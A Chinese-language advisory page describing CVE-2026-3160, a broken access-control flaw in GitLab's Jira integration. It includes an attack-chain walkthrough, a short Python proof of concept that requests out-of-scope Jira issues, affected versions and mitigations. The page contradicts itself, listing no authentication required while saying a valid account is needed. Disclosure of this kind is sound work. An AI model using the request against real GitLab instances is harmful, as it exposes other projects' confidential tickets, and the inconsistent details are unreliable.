CVE-2026-3160 CVSS 5.8 中危

CVE-2026-3160 GitLab Jira集成越权访问漏洞

披露日期: 2026-05-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-3160

漏洞类型

信息泄露

CVSS评分

5.8 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

GitLab CE/EE

漏洞概述

GitLab CE/EE 在处理 Jira 集成时存在安全漏洞，影响从 13.7 到 18.11.3 之前的多个版本。该漏洞的成因是集成过滤器仅作为显示控制，未能有效执行访问边界限制。由于这一逻辑缺陷，经过身份验证的攻击者可以绕过项目配置范围，查看本无权访问的 Jira 问题。此漏洞可能导致敏感信息泄露，CVSS 评分为 5.8（中危）。建议受影响用户尽快升级至官方修复版本以消除风险。

技术细节

该漏洞属于权限控制失效类漏洞，具体表现为 GitLab 与 Jira 集成组件中的访问控制列表（ACL）验证缺失。在受影响的 GitLab 版本中，当管理员配置 Jira 集成以同步特定项目的问题时，系统后端在处理 API 请求时并未严格校验当前用户是否有权访问请求的 Jira Issue ID。过滤器仅在 UI 层面对数据进行了筛选，而在数据获取层面缺乏强制性的权限检查。因此，攻击者只需拥有 GitLab 的有效账户（无需管理员权限），即可通过构造特定的 HTTP 请求，直接访问其他项目或受保护范围外的 Jira 工单数据。这种漏洞利用了前后端逻辑不一致的缺陷，利用成本低，且无需复杂的用户交互，成功利用后可直接导致敏感业务信息的机密性受损。

攻击链分析

STEP 1

步骤1：身份认证

攻击者注册或使用已有的普通用户账户登录到受影响的 GitLab 实例。

STEP 2

步骤2：识别集成接口

攻击者确定 GitLab 实例已配置 Jira 集成，并定位到用于获取 Jira 问题的 API 端点。

STEP 3

步骤3：构造越权请求

攻击者修改 API 请求参数，指定一个不在其项目权限范围内的 Jira Issue ID。

STEP 4

步骤4：获取敏感数据

由于后端未正确执行访问边界检查，GitLab 返回了该 Jira 问题的详细信息，导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target GitLab URL and Vulnerable Endpoint
# Replace with actual target URL for testing purposes only
target_url = "https://gitlab.example.com/api/v4/integrations/jira/issues"

# Valid authentication token (Private Access Token)
headers = {
    "Authorization": "Bearer <YOUR_VALID_TOKEN>"
}

# The ID of a Jira issue that is outside the configured project scope
# Attacker attempts to access restricted data
params = {
    "issue_id": "PROJ-1234"  # Target Jira Issue ID
}

try:
    response = requests.get(target_url, headers=headers, params=params)

    if response.status_code == 200:
        print("[+] Vulnerability Confirmed!")
        print("[+] Leaked Jira Issue Data:")
        print(response.json())
    else:
        print("[-] Request failed or access denied.")
        print(f"Status Code: {response.status_code}")

except Exception as e:
    print(f"Error: {e}")

影响范围

GitLab CE/EE >= 13.7, < 18.9.7

GitLab CE/EE >= 18.10, < 18.10.6

GitLab CE/EE >= 18.11, < 18.11.3

防御指南

临时缓解措施

如果无法立即升级，建议管理员暂时禁用 Jira 集成功能以防止数据泄露。同时，应严格审查 GitLab 的访问日志，检查是否存在针对 Jira 集成接口的异常访问请求，以确认漏洞是否已被利用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表